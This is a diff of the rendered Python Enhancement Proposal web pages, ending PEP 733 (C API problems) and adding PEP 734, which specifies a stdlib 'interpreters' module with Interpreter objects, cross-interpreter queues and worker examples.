Python.h does not expose the whole API. Some headers (like marshal.h) +are not included from Python.h. +[Issue 43].

+

Naming

+

PyLong and PyUnicode use names which no longer match the Python +types they represent (int/str). This could be fixed in a new API +[Issue 14].

+

There are identifiers in the API which are lacking a Py/_Py +prefix +[Issue 46].

+
+
+

Missing Functionality

+

This section consists of a list of feature requests, i.e., functionality +that was identified as missing in the current C API.

+
+

Debug Mode

+

A debug mode that can be activated without recompilation and which +activates various checks that can help detect various types of errors +[Issue 36].

+
+
+

Introspection

+

There aren’t currently reliable introspection capabilities for objects +defined in C in the same way as there are for Python objects +[Issue 32].

+

Efficient type checking for heap types +[Issue 17].

+
+
+

Improved Interaction with Other Languages

+

Interfacing with other GC based languages, and integrating their +GC with Python’s GC +[Issue 19].

+

Inject foreign stack frames to the traceback +[Issue 18].

+

Concrete strings that can be used in other languages +[Issue 16].

+
+
+
+
+

References

+
    +
  1. Python/C API Reference Manual
  2. +
  3. 2023 Language Summit Blog Post: Three Talks on the C API
  4. +
  5. capi-workgroup on GitHub
  6. +
  7. Irit’s Core Sprint 2023 slides about C API workgroup
  8. +
  9. Petr’s Core Sprint 2023 slides
  10. +
  11. HPy team’s Core Sprint 2023 slides for Things to Learn from HPy
  12. +
  13. Victor’s slides of Core Sprint 2023 Python C API talk
  14. +
  15. The Python’s stability promise — Cristián Maureira-Fredes, PySide maintainer
  16. +
  17. Report on the issues PySide had 5 years ago when switching to the stable ABI
  18. +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0733.rst

+

Last modified: 2024-10-28 18:52:58 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0734/index.html b/pep-0734/index.html new file mode 100644 index 00000000000..1a5ca19e5ce --- /dev/null +++ b/pep-0734/index.html @@ -0,0 +1,1168 @@ + + + + + + + + PEP 734 – Multiple Interpreters in the Stdlib | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 734 – Multiple Interpreters in the Stdlib

+
+
Author:
+
Eric Snow <ericsnowcurrently at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
06-Nov-2023
+
Python-Version:
+
3.13
+
Post-History:
+
14-Dec-2023
+
Replaces:
+
554
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Note

+

This PEP is essentially a continuation of PEP 554. That document +had grown a lot of ancillary information across 7 years of discussion. +This PEP is a reduction back to the essential information. Much of +that extra information is still valid and useful, just not in the +immediate context of the specific proposal here.

+
+
+

Abstract

+

This PEP proposes to add a new module, interpreters, to support +inspecting, creating, and running code in multiple interpreters in the +current process. This includes Interpreter objects that represent +the underlying interpreters. The module will also provide a basic +Queue class for communication between interpreters. +Finally, we will add a new concurrent.futures.InterpreterPoolExecutor +based on the interpreters module.

+
+
+

Introduction

+

Fundamentally, an “interpreter” is the collection of (essentially) +all runtime state which Python threads must share. So, let’s first +look at threads. Then we’ll circle back to interpreters.

+
+

Threads and Thread States

+

A Python process will have one or more OS threads running Python code +(or otherwise interacting with the C API). Each of these threads +interacts with the CPython runtime using its own thread state +(PyThreadState), which holds all the runtime state unique to that +thread. There is also some runtime state that is shared between +multiple OS threads.

+

Any OS thread may switch which thread state it is currently using, as +long as it isn’t one that another OS thread is already using (or has +been using). This “current” thread state is stored by the runtime +in a thread-local variable, and may be looked up explicitly with +PyThreadState_Get(). It gets set automatically for the initial +(“main”) OS thread and for threading.Thread objects. From the +C API it is set (and cleared) by PyThreadState_Swap() and may +be set by PyGILState_Ensure(). Most of the C API requires that +there be a current thread state, either looked up implicitly +or passed in as an argument.

+

The relationship between OS threads and thread states is one-to-many. +Each thread state is associated with at most a single OS thread and +records its thread ID. A thread state is never used for more than one +OS thread. In the other direction, however, an OS thread may have more +than one thread state associated with it, though, again, only one +may be current.

+

When there’s more than one thread state for an OS thread, +PyThreadState_Swap() is used in that OS thread to switch +between them, with the requested thread state becoming the current one. +Whatever was running in the thread using the old thread state is +effectively paused until that thread state is swapped back in.

+
+
+

Interpreter States

+

As noted earlier, there is some runtime state that multiple OS threads +share. Some of it is exposed by the sys module, though much is +used internally and not exposed explicitly or only through the C API.

+

This shared state is called the interpreter state +(PyInterpreterState). We’ll sometimes refer to it here as just +“interpreter”, though that is also sometimes used to refer to the +python executable, to the Python implementation, and to the +bytecode interpreter (i.e. exec()/eval()).

+

CPython has supported multiple interpreters in the same process (AKA +“subinterpreters”) since version 1.5 (1997). The feature has been +available via the C API.

+
+
+

Interpreters and Threads

+

Thread states are related to interpreter states in much the same way +that OS threads and processes are related (at a high level). To +begin with, the relationship is one-to-many. +A thread state belongs to a single interpreter (and stores +a pointer to it). That thread state is never used for a different +interpreter. In the other direction, however, an interpreter may have +zero or more thread states associated with it. The interpreter is only +considered active in OS threads where one of its thread states +is current.

+

Interpreters are created via the C API using +Py_NewInterpreterFromConfig() (or Py_NewInterpreter(), which +is a light wrapper around Py_NewInterpreterFromConfig()). +That function does the following:

+
    +
  1. create a new interpreter state
  2. +
  3. create a new thread state
  4. +
  5. set the thread state as current +(a current tstate is needed for interpreter init)
  6. +
  7. initialize the interpreter state using that thread state
  8. +
  9. return the thread state (still current)
  10. +
+

Note that the returned thread state may be immediately discarded. +There is no requirement that an interpreter have any thread states, +except as soon as the interpreter is meant to actually be used. +At that point it must be made active in the current OS thread.

+

To make an existing interpreter active in the current OS thread, +the C API user first makes sure that interpreter has a corresponding +thread state. Then PyThreadState_Swap() is called like normal +using that thread state. If the thread state for another interpreter +was already current then it gets swapped out like normal and execution +of that interpreter in the OS thread is thus effectively paused until +it is swapped back in.

+

Once an interpreter is active in the current OS thread like that, the +thread can call any of the C API, such as PyEval_EvalCode() +(i.e. exec()). This works by using the current thread state as +the runtime context.

+
+
+

The “Main” Interpreter

+

When a Python process starts, it creates a single interpreter state +(the “main” interpreter) with a single thread state for the current +OS thread. The Python runtime is then initialized using them.

+

After initialization, the script or module or REPL is executed using +them. That execution happens in the interpreter’s __main__ module.

+

When the process finishes running the requested Python code or REPL, +in the main OS thread, the Python runtime is finalized in that thread +using the main interpreter.

+

Runtime finalization has only a slight, indirect effect on still-running +Python threads, whether in the main interpreter or in subinterpreters. +That’s because right away it waits indefinitely for all non-daemon +Python threads to finish.

+

While the C API may be queried, there is no mechanism by which any +Python thread is directly alerted that finalization has begun, +other than perhaps with “atexit” functions that may be been +registered using threading._register_atexit().

+

Any remaining subinterpreters are themselves finalized later, +but at that point they aren’t current in any OS threads.

+
+
+

Interpreter Isolation

+

CPython’s interpreters are intended to be strictly isolated from each +other. That means interpreters never share objects (except in very +specific cases with immortal, immutable builtin objects). Each +interpreter has its own modules (sys.modules), classes, functions, +and variables. Even where two interpreters define the same class, +each will have its own copy. The same applies to state in C, including +in extension modules. The CPython C API docs explain more.

+

Notably, there is some process-global state that interpreters will +always share, some mutable and some immutable. Sharing immutable +state presents few problems, while providing some benefits (mainly +performance). However, all shared mutable state requires special +management, particularly for thread-safety, some of which the OS +takes care of for us.

+

Mutable:

+
    +
  • file descriptors
  • +
  • low-level env vars
  • +
  • process memory (though allocators are isolated)
  • +
  • the list of interpreters
  • +
+

Immutable:

+
    +
  • builtin types (e.g. dict, bytes)
  • +
  • singletons (e.g. None)
  • +
  • underlying static module data (e.g. functions) for +builtin/extension/frozen modules
  • +
+
+
+

Existing Execution Components

+

There are a number of existing parts of Python that may help +with understanding how code may be run in a subinterpreter.

+

In CPython, each component is built around one of the following +C API functions (or variants):

+
    +
  • PyEval_EvalCode(): run the bytecode interpreter with the given +code object
  • +
  • PyRun_String(): compile + PyEval_EvalCode()
  • +
  • PyRun_File(): read + compile + PyEval_EvalCode()
  • +
  • PyRun_InteractiveOneObject(): compile + PyEval_EvalCode()
  • +
  • PyObject_Call(): calls PyEval_EvalCode()
  • +
+
+

builtins.exec()

+

The builtin exec() may be used to execute Python code. It is +essentially a wrapper around the C API functions PyRun_String() +and PyEval_EvalCode().

+

Here are some relevant characteristics of the builtin exec():

+
    +
  • It runs in the current OS thread and pauses whatever +was running there, which resumes when exec() finishes. +No other OS threads are affected. +(To avoid pausing the current Python thread, run exec() +in a threading.Thread.)
  • +
  • It may start additional threads, which don’t interrupt it.
  • +
  • It executes against a “globals” namespace (and a “locals” +namespace). At module-level, exec() defaults to using +__dict__ of the current module (i.e. globals()). +exec() uses that namespace as-is and does not clear it before or after.
  • +
  • It propagates any uncaught exception from the code it ran. +The exception is raised from the exec() call in the Python +thread that originally called exec().
  • +
+
+
+

Command-line

+

The python CLI provides several ways to run Python code. In each +case it maps to a corresponding C API call:

+
    +
  • <no args>, -i - run the REPL +(PyRun_InteractiveOneObject())
  • +
  • <filename> - run a script (PyRun_File())
  • +
  • -c <code> - run the given Python code (PyRun_String())
  • +
  • -m module - run the module as a script +(PyEval_EvalCode() via runpy._run_module_as_main())
  • +
+

In each case it is essentially a variant of running exec() +at the top-level of the __main__ module of the main interpreter.

+
+
+

threading.Thread

+

When a Python thread is started, it runs the “target” function +with PyObject_Call() using a new thread state. The globals +namespace come from func.__globals__ and any uncaught +exception is discarded.

+
+
+
+
+

Motivation

+

The interpreters module will provide a high-level interface to the +multiple interpreter functionality. The goal is to make the existing +multiple-interpreters feature of CPython more easily accessible to +Python code. This is particularly relevant now that CPython has a +per-interpreter GIL (PEP 684) and people are more interested +in using multiple interpreters.

+

Without a stdlib module, users are limited to the +C API, which restricts how much +they can try out and take advantage of multiple interpreters.

+

The module will include a basic mechanism for communicating between +interpreters. Without one, multiple interpreters are a much less +useful feature.

+
+
+

Specification

+

The module will:

+
    +
  • expose the existing multiple interpreter support
  • +
  • introduce a basic mechanism for communicating between interpreters
  • +
+

The module will wrap a new low-level _interpreters module +(in the same way as the threading module). +However, that low-level API is not intended for public use +and thus not part of this proposal.

+
+

Using Interpreters

+

The module defines the following functions:

+
    +
  • +
    get_current() -> Interpreter
    Returns the Interpreter object for the currently executing +interpreter.
    +
    +
  • +
  • +
    list_all() -> list[Interpreter]
    Returns the Interpreter object for each existing interpreter, +whether it is currently running in any OS threads or not.
    +
    +
  • +
  • +
    create() -> Interpreter
    Create a new interpreter and return the Interpreter object +for it. The interpreter doesn’t do anything on its own and is +not inherently tied to any OS thread. That only happens when +something is actually run in the interpreter +(e.g. Interpreter.exec()), and only while running. +The interpreter may or may not have thread states ready to use, +but that is strictly an internal implementation detail.
    +
    +
  • +
+
+
+

Interpreter Objects

+

An interpreters.Interpreter object that represents the interpreter +(PyInterpreterState) with the corresponding unique ID. +There will only be one object for any given interpreter.

+

If the interpreter was created with interpreters.create() then +it will be destroyed as soon as all Interpreter objects with its ID +(across all interpreters) have been deleted.

+

Interpreter objects may represent other interpreters than those +created by interpreters.create(). Examples include the main +interpreter (created by Python’s runtime initialization) and those +created via the C-API, using Py_NewInterpreter(). Such +Interpreter objects will not be able to interact with their +corresponding interpreters, e.g. via Interpreter.exec() +(though we may relax this in the future).

+

Attributes and methods:

+
    +
  • +
    id
    (read-only) A non-negative int that identifies the +interpreter that this Interpreter instance represents. +Conceptually, this is similar to a process ID.
    +
    +
  • +
  • +
    __hash__()
    Returns the hash of the interpreter’s id. This is the same +as the hash of the ID’s integer value.
    +
    +
  • +
  • +
    is_running() -> bool
    Returns True if the interpreter is currently executing code +in its __main__ module. This excludes sub-threads.

    It refers only to if there is an OS thread +running a script (code) in the interpreter’s __main__ module. +That basically means whether or not Interpreter.exec() +is running in some OS thread. Code running in sub-threads +is ignored.

    +
    +
    +
  • +
  • +
    prepare_main(**kwargs)
    Bind one or more objects in the interpreter’s __main__ module.

    The keyword argument names will be used as the attribute names. +The values will be bound as new objects, though exactly equivalent +to the original. Only objects specifically supported for passing +between interpreters are allowed. See Shareable Objects.

    +

    prepare_main() is helpful for initializing the +globals for an interpreter before running code in it.

    +
    +
    +
  • +
  • +
    exec(code, /)
    Execute the given source code in the interpreter +(in the current OS thread), using its __main__ module. +It doesn’t return anything.

    This is essentially equivalent to switching to this interpreter +in the current OS thread and then calling the builtin exec() +using this interpreter’s __main__ module’s __dict__ as +the globals and locals.

    +

    The code running in the current OS thread (a different +interpreter) is effectively paused until Interpreter.exec() +finishes. To avoid pausing it, create a new threading.Thread +and call Interpreter.exec() in it +(like Interpreter.call_in_thread() does).

    +

    Interpreter.exec() does not reset the interpreter’s state nor +the __main__ module, neither before nor after, so each +successive call picks up where the last one left off. This can +be useful for running some code to initialize an interpreter +(e.g. with imports) before later performing some repeated task.

    +

    If there is an uncaught exception, it will be propagated into +the calling interpreter as an ExecutionFailed. The full error +display of the original exception, generated relative to the +called interpreter, is preserved on the propagated ExecutionFailed. +That includes the full traceback, with all the extra info like +syntax error details and chained exceptions. +If the ExecutionFailed is not caught then that full error display +will be shown, much like it would be if the propagated exception +had been raised in the main interpreter and uncaught. Having +the full traceback is particularly useful when debugging.

    +

    If exception propagation is not desired then an explicit +try-except should be used around the code passed to +Interpreter.exec(). Likewise any error handling that depends +on specific information from the exception must use an explicit +try-except around the given code, since ExecutionFailed +will not preserve that information.

    +
    +
    +
  • +
  • +
    call(callable, /)
    Call the callable object in the interpreter. +The return value is discarded. If the callable raises an exception +then it gets propagated as an ExecutionFailed exception, +in the same way as Interpreter.exec().

    For now only plain functions are supported and only ones that +take no arguments and have no cell vars. Free globals are resolved +against the target interpreter’s __main__ module.

    +

    In the future, we can add support for arguments, closures, +and a broader variety of callables, at least partly via pickle. +We can also consider not discarding the return value. +The initial restrictions are in place to allow us to get the basic +functionality of the module out to users sooner.

    +
    +
    +
  • +
  • +
    call_in_thread(callable, /) -> threading.Thread
    Essentially, apply Interpreter.call() in a new thread. +Return values are discarded and exceptions are not propagated.

    call_in_thread() is roughly equivalent to:

    +
    def task():
    +    interp.call(func)
    +t = threading.Thread(target=task)
    +t.start()
    +
    +
    +
    +
    +
  • +
  • +
    close()
    Destroy the underlying interpreter.
    +
    +
  • +
+
+
+

Communicating Between Interpreters

+

The module introduces a basic communication mechanism through special +queues.

+

There are interpreters.Queue objects, but they only proxy +the actual data structure: an unbounded FIFO queue that exists +outside any one interpreter. These queues have special accommodations +for safely passing object data between interpreters, without violating +interpreter isolation. This includes thread-safety.

+

As with other queues in Python, for each “put” the object is added to +the back and each “get” pops the next one off the front. Every added +object will be popped off in the order it was pushed on.

+

Only objects that are specifically supported for passing +between interpreters may be sent through an interpreters.Queue. +Note that the actual objects aren’t sent, but rather their +underlying data. However, the popped object will still be +strictly equivalent to the original. +See Shareable Objects.

+

The module defines the following functions:

+
    +
  • +
    create_queue(maxsize=0, *, syncobj=False) -> Queue
    Create a new queue. If the maxsize is zero or negative then the +queue is unbounded.

    “syncobj” is used as the default for put() and put_nowait().

    +
    +
    +
  • +
+
+
+

Queue Objects

+

interpreters.Queue objects act as proxies for the underlying +cross-interpreter-safe queues exposed by the interpreters module. +Each Queue object represents the queue with the corresponding +unique ID. +There will only be one object for any given queue.

+

Queue implements all the methods of queue.Queue except for +task_done() and join(), hence it is similar to +asyncio.Queue and multiprocessing.Queue.

+

Attributes and methods:

+
    +
  • +
    id
    (read-only) A non-negative int that identifies +the corresponding cross-interpreter queue. +Conceptually, this is similar to the file descriptor +used for a pipe.
    +
    +
  • +
  • +
    maxsize
    (read-only) Number of items allowed in the queue. +Zero means “unbounded”.
    +
    +
  • +
  • +
    __hash__()
    Return the hash of the queue’s id. This is the same +as the hash of the ID’s integer value.
    +
    +
  • +
  • +
    empty()
    Return True if the queue is empty, False otherwise.

    This is only a snapshot of the state at the time of the call. +Other threads or interpreters may cause this to change.

    +
    +
    +
  • +
  • +
    full()
    Return True if there are maxsize items in the queue.

    If the queue was initialized with maxsize=0 (the default), +then full() never returns True.

    +

    This is only a snapshot of the state at the time of the call. +Other threads or interpreters may cause this to change.

    +
    +
    +
  • +
  • +
    qsize()
    Return the number of items in the queue.

    This is only a snapshot of the state at the time of the call. +Other threads or interpreters may cause this to change.

    +
    +
    +
  • +
  • +
    put(obj, timeout=None, *, syncobj=None)
    Add the object to the queue.

    If maxsize > 0 and the queue is full then this blocks until +a free slot is available. If timeout is a positive number +then it only blocks at least that many seconds and then raises +interpreters.QueueFull. Otherwise is blocks forever.

    +

    If “syncobj” is true then the object must be +shareable, which means the object’s data +is passed through rather than the object itself. +If “syncobj” is false then all objects are supported. However, +there are some performance penalties and all objects are copies +(e.g. via pickle). Thus mutable objects will never be +automatically synchronized between interpreters. +If “syncobj” is None (the default) then the queue’s default +value is used.

    +

    If an object is still in the queue, and the interpreter which put +it in the queue (i.e. to which it belongs) is destroyed, then the +object is immediately removed from the queue. (We may later add +an option to replace the removed object in the queue with a +sentinel or to raise an exception for the corresponding get() +call.)

    +
    +
    +
  • +
  • +
    put_nowait(obj, *, syncobj=None)
    Like put() but effectively with an immediate timeout. +Thus if the queue is full, it immediately raises +interpreters.QueueFull.
    +
    +
  • +
  • +
    get(timeout=None) -> object
    Pop the next object from the queue and return it. Block while +the queue is empty. If a positive timeout is provided and an +object hasn’t been added to the queue in that many seconds +then raise interpreters.QueueEmpty.
    +
    +
  • +
  • +
    get_nowait() -> object
    Like get(), but do not block. If the queue is not empty +then return the next item. Otherwise, raise +interpreters.QueueEmpty.
    +
    +
  • +
+
+
+

Shareable Objects

+

Interpreter.prepare_main() only works with “shareable” objects. +The same goes for interpreters.Queue (optionally).

+

A “shareable” object is one which may be passed from one interpreter +to another. The object is not necessarily actually directly shared +by the interpreters. However, even if it isn’t, the shared object +should be treated as though it were shared directly. That’s a +strong equivalence guarantee for all shareable objects. +(See below.)

+

For some types (builtin singletons), the actual object is shared. +For some, the object’s underlying data is actually shared but each +interpreter has a distinct object wrapping that data. For all other +shareable types, a strict copy or proxy is made such that the +corresponding objects continue to match exactly. In cases where +the underlying data is complex but must be copied (e.g. tuple), +the data is serialized as efficiently as possible.

+

Shareable objects must be specifically supported internally +by the Python runtime. However, there is no restriction against +adding support for more types later.

+

Here’s the initial list of supported objects:

+
    +
  • str
  • +
  • bytes
  • +
  • int
  • +
  • float
  • +
  • bool (True/False)
  • +
  • None
  • +
  • tuple (only with shareable items)
  • +
  • interpreters.Queue
  • +
  • memoryview (underlying buffer actually shared)
  • +
+

Note that the last two on the list, queues and memoryview, are +technically mutable data types, whereas the rest are not. When any +interpreters share mutable data there is always a risk of data races. +Cross-interpreter safety, including thread-safety, is a fundamental +feature of queues.

+

However, memoryview does not have any native accommodations. +The user is responsible for managing thread-safety, whether passing +a token back and forth through a queue to indicate safety +(see Synchronization), or by assigning sub-range exclusivity +to individual interpreters.

+

Most objects will be shared through queues (interpreters.Queue), +as interpreters communicate information between each other. +Less frequently, objects will be shared through prepare_main() +to set up an interpreter prior to running code in it. However, +prepare_main() is the primary way that queues are shared, +to provide another interpreter with a means +of further communication.

+

Finally, a reminder: for a few types the actual object is shared, +whereas for the rest only the underlying data is shared, whether +as a copy or through a proxy. Regardless, it always preserves +the strong equivalence guarantee of “shareable” objects.

+

The guarantee is that a shared object in one interpreter is strictly +equivalent to the corresponding object in the other interpreter. +In other words, the two objects will be indistinguishable from each +other. The shared object should be treated as though the original +had been shared directly, whether or not it actually was. +That’s a slightly different and stronger promise than just equality.

+

The guarantee is especially important for mutable objects, like +Interpreters.Queue and memoryview. Mutating the object +in one interpreter will always be reflected immediately in every +other interpreter sharing the object.

+
+
+

Synchronization

+

There are situations where two interpreters should be synchronized. +That may involve sharing a resource, worker management, or preserving +sequential consistency.

+

In threaded programming the typical synchronization primitives are +types like mutexes. The threading module exposes several. +However, interpreters cannot share objects which means they cannot +share threading.Lock objects.

+

The interpreters module does not provide any such dedicated +synchronization primitives. Instead, interpreters.Queue +objects provide everything one might need.

+

For example, if there’s a shared resource that needs managed +access then a queue may be used to manage it, where the interpreters +pass an object around to indicate who can use the resource:

+
import interpreters
+from mymodule import load_big_data, check_data
+
+numworkers = 10
+control = interpreters.create_queue()
+data = memoryview(load_big_data())
+
+def worker():
+    interp = interpreters.create()
+    interp.prepare_main(control=control, data=data)
+    interp.exec("""if True:
+        from mymodule import edit_data
+        while True:
+            token = control.get()
+            edit_data(data)
+            control.put(token)
+        """)
+threads = [threading.Thread(target=worker) for _ in range(numworkers)]
+for t in threads:
+    t.start()
+
+token = 'football'
+control.put(token)
+while True:
+    control.get()
+    if not check_data(data):
+        break
+    control.put(token)
+
+
+
+
+

Exceptions

+
    +
  • +
    InterpreterError
    Indicates that some interpreter-related failure occurred.

    This exception is a subclass of Exception.

    +
    +
    +
  • +
  • +
    InterpreterNotFoundError
    Raised from Interpreter methods after the underlying +interpreter has been destroyed, e.g. via the C-API.

    This exception is a subclass of InterpreterError.

    +
    +
    +
  • +
  • +
    ExecutionFailed
    Raised from Interpreter.exec() and Interpreter.call() +when there’s an uncaught exception. +The error display for this exception includes the traceback +of the uncaught exception, which gets shown after the normal +error display, much like happens for ExceptionGroup.

    Attributes:

    +
      +
    • type - a representation of the original exception’s class, +with __name__, __module__, and __qualname__ attrs.
    • +
    • msg - str(exc) of the original exception
    • +
    • snapshot - a traceback.TracebackException object +for the original exception
    • +
    +

    This exception is a subclass of InterpreterError.

    +
    +
    +
  • +
  • +
    QueueError
    Indicates that some queue-related failure occurred.

    This exception is a subclass of Exception.

    +
    +
    +
  • +
  • +
    QueueNotFoundError
    Raised from interpreters.Queue methods after the underlying +queue has been destroyed.

    This exception is a subclass of QueueError.

    +
    +
    +
  • +
  • +
    QueueEmpty
    Raised from Queue.get() (or get_nowait() with no default) +when the queue is empty.

    This exception is a subclass of both QueueError +and the stdlib queue.Empty.

    +
    +
    +
  • +
  • +
    QueueFull
    Raised from Queue.put() (with a timeout) or put_nowait() +when the queue is already at its max size.

    This exception is a subclass of both QueueError +and the stdlib queue.Empty.

    +
    +
    +
  • +
+
+
+

InterpreterPoolExecutor

+

Along with the new interpreters module, there will be a new +concurrent.futures.InterpreterPoolExecutor. It will be a +derivative of ThreadPoolExecutor, where each worker executes +in its own thread, but each with its own subinterpreter.

+

Like the other executors, InterpreterPoolExecutor will support +callables for tasks, and for the initializer. Also like the other +executors, the arguments in both cases will be mostly unrestricted. +The callables and arguments will typically be serialized when sent +to a worker’s interpreter, e.g. with pickle, like how the +ProcessPoolExecutor works. This contrasts with +Interpreter.call(), which will (at least initially) +be much more restricted.

+

Communication between workers, or between the executor +(or generally its interpreter) and the workers, may still be done +through interpreters.Queue objects, set with the initializer.

+
+
+

sys.implementation.supports_isolated_interpreters

+

Python implementations are not required to support subinterpreters, +though most major ones do. If an implementation does support them +then sys.implementation.supports_isolated_interpreters will be +set to True. Otherwise it will be False. If the feature +is not supported then importing the interpreters module will +raise an ImportError.

+
+
+

Examples

+

The following examples demonstrate practical cases where multiple +interpreters may be useful.

+

Example 1:

+

There’s a stream of requests coming in that will be handled +via workers in sub-threads.

+
    +
  • each worker thread has its own interpreter
  • +
  • there’s one queue to send tasks to workers and +another queue to return results
  • +
  • the results are handled in a dedicated thread
  • +
  • each worker keeps going until it receives a “stop” sentinel (None)
  • +
  • the results handler keeps going until all workers have stopped
  • +
+
import interpreters
+from mymodule import iter_requests, handle_result
+
+tasks = interpreters.create_queue()
+results = interpreters.create_queue()
+
+numworkers = 20
+threads = []
+
+def results_handler():
+    running = numworkers
+    while running:
+        try:
+            res = results.get(timeout=0.1)
+        except interpreters.QueueEmpty:
+            # No workers have finished a request since last time.
+            pass
+        else:
+            if res is None:
+                # A worker has stopped.
+                running -= 1
+            else:
+                handle_result(res)
+    empty = object()
+    assert results.get_nowait(empty) is empty
+threads.append(threading.Thread(target=results_handler))
+
+def worker():
+    interp = interpreters.create()
+    interp.prepare_main(tasks=tasks, results=results)
+    interp.exec("""if True:
+        from mymodule import handle_request, capture_exception
+
+        while True:
+            req = tasks.get()
+            if req is None:
+                # Stop!
+                break
+            try:
+                res = handle_request(req)
+            except Exception as exc:
+                res = capture_exception(exc)
+            results.put(res)
+        # Notify the results handler.
+        results.put(None)
+        """)
+threads.extend(threading.Thread(target=worker) for _ in range(numworkers))
+
+for t in threads:
+    t.start()
+
+for req in iter_requests():
+    tasks.put(req)
+# Send the "stop" signal.
+for _ in range(numworkers):
+    tasks.put(None)
+
+for t in threads:
+    t.join()
+
+
+

Example 2:

+

This case is similar to the last as there are a bunch of workers +in sub-threads. However, this time the code is chunking up a big array +of data, where each worker processes one chunk at a time. Copying +that data to each interpreter would be exceptionally inefficient, +so the code takes advantage of directly sharing memoryview buffers.

+
    +
  • all the interpreters share the buffer of the source array
  • +
  • each one writes its results to a second shared buffer
  • +
  • there’s use a queue to send tasks to workers
  • +
  • only one worker will ever read any given index in the source array
  • +
  • only one worker will ever write to any given index in the results +(this is how it ensures thread-safety)
  • +
+
import interpreters
+import queue
+from mymodule import read_large_data_set, use_results
+
+numworkers = 3
+data, chunksize = read_large_data_set()
+buf = memoryview(data)
+numchunks = (len(buf) + 1) / chunksize
+results = memoryview(b'\0' * numchunks)
+
+tasks = interpreters.create_queue()
+
+def worker(id):
+    interp = interpreters.create()
+    interp.prepare_main(data=buf, results=results, tasks=tasks)
+    interp.exec("""if True:
+        from mymodule import reduce_chunk
+
+        while True:
+            req = tasks.get()
+            if res is None:
+                # Stop!
+                break
+            resindex, start, end = req
+            chunk = data[start: end]
+            res = reduce_chunk(chunk)
+            results[resindex] = res
+        """)
+threads = [threading.Thread(target=worker) for _ in range(numworkers)]
+for t in threads:
+    t.start()
+
+for i in range(numchunks):
+    # Assume there's at least one worker running still.
+    start = i * chunksize
+    end = start + chunksize
+    if end > len(buf):
+        end = len(buf)
+    tasks.put((start, end, i))
+# Send the "stop" signal.
+for _ in range(numworkers):
+    tasks.put(None)
+
+for t in threads:
+    t.join()
+
+use_results(results)
+
+
+
+
+
+

Rationale

+
+

A Minimal API

+

Since the core dev team has no real experience with +how users will make use of multiple interpreters in Python code, this +proposal purposefully keeps the initial API as lean and minimal as +possible. The objective is to provide a well-considered foundation +on which further (more advanced) functionality may be added later, +as appropriate.

+

That said, the proposed design incorporates lessons learned from +existing use of subinterpreters by the community, from existing stdlib +modules, and from other programming languages. It also factors in +experience from using subinterpreters in the CPython test suite and +using them in concurrency benchmarks.

+
+
+

create(), create_queue()

+

Typically, users call a type to create instances of the type, at which +point the object’s resources get provisioned. The interpreters +module takes a different approach, where users must call create() +to get a new interpreter or create_queue() for a new queue. +Calling interpreters.Interpreter() directly only returns a wrapper +around an existing interpreters (likewise for +interpreters.Queue()).

+

This is because interpreters (and queues) are special resources. +They exist globally in the process and are not managed/owned by the +current interpreter. Thus the interpreters module makes creating +an interpreter (or queue) a visibly distinct operation from creating +an instance of interpreters.Interpreter +(or interpreters.Queue).

+
+
+

Interpreter.prepare_main() Sets Multiple Variables

+

prepare_main() may be seen as a setter function of sorts. +It supports setting multiple names at once, +e.g. interp.prepare_main(spam=1, eggs=2), whereas most setters +set one item at a time. The main reason is for efficiency.

+

To set a value in the interpreter’s __main__.__dict__, the +implementation must first switch the OS thread to the identified +interpreter, which involves some non-negligible overhead. After +setting the value it must switch back. +Furthermore, there is some additional overhead to the mechanism +by which it passes objects between interpreters, which can be +reduced in aggregate if multiple values are set at once.

+

Therefore, prepare_main() supports setting multiple +values at once.

+
+
+

Propagating Exceptions

+

An uncaught exception from a subinterpreter, +via Interpreter.exec(), +could either be (effectively) ignored, +like threading.Thread() does, +or propagated, like the builtin exec() does. +Since Interpreter.exec() is a synchronous operation, +like the builtin exec(), uncaught exceptions are propagated.

+

However, such exceptions are not raised directly. That’s because +interpreters are isolated from each other and must not share objects, +including exceptions. That could be addressed by raising a surrogate +of the exception, whether a summary, a copy, or a proxy that wraps it. +Any of those could preserve the traceback, which is useful for +debugging. The ExecutionFailed that gets raised +is such a surrogate.

+

There’s another concern to consider. If a propagated exception isn’t +immediately caught, it will bubble up through the call stack until +caught (or not). In the case that code somewhere else may catch it, +it is helpful to identify that the exception came from a subinterpreter +(i.e. a “remote” source), rather than from the current interpreter. +That’s why Interpreter.exec() raises ExecutionFailed and why +it is a plain Exception, rather than a copy or proxy with a class +that matches the original exception. For example, an uncaught +ValueError from a subinterpreter would never get caught in a later +try: ... except ValueError: .... Instead, ExecutionFailed +must be handled directly.

+

In contrast, exceptions propagated from Interpreter.call() do not +involve ExecutionFailed but are raised directly, as though originating +in the calling interpreter. This is because Interpreter.call() is +a higher level method that uses pickle to support objects that can’t +normally be passed between interpreters.

+
+
+

Limited Object Sharing

+

As noted in Interpreter Isolation, only a small number of builtin +objects may be truly shared between interpreters. In all other cases +objects can only be shared indirectly, through copies or proxies.

+

The set of objects that are shareable as copies through queues +(and Interpreter.prepare_main()) is limited for the sake of +efficiency.

+

Supporting sharing of all objects is possible (via pickle) +but not part of this proposal. For one thing, it’s helpful to know +in those cases that only an efficient implementation is being used. +Furthermore, in those cases supporting mutable objects via pickling +would violate the guarantee that “shared” objects be equivalent +(and stay that way).

+
+
+

Objects vs. ID Proxies

+

For both interpreters and queues, the low-level module makes use of +proxy objects that expose the underlying state by their corresponding +process-global IDs. In both cases the state is likewise process-global +and will be used by multiple interpreters. Thus they aren’t suitable +to be implemented as PyObject, which is only really an option for +interpreter-specific data. That’s why the interpreters module +instead provides objects that are weakly associated through the ID.

+
+
+
+

Rejected Ideas

+

See PEP 554.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0734.rst

+

Last modified: 2024-04-10 21:49:06 GMT

+ +
+ +
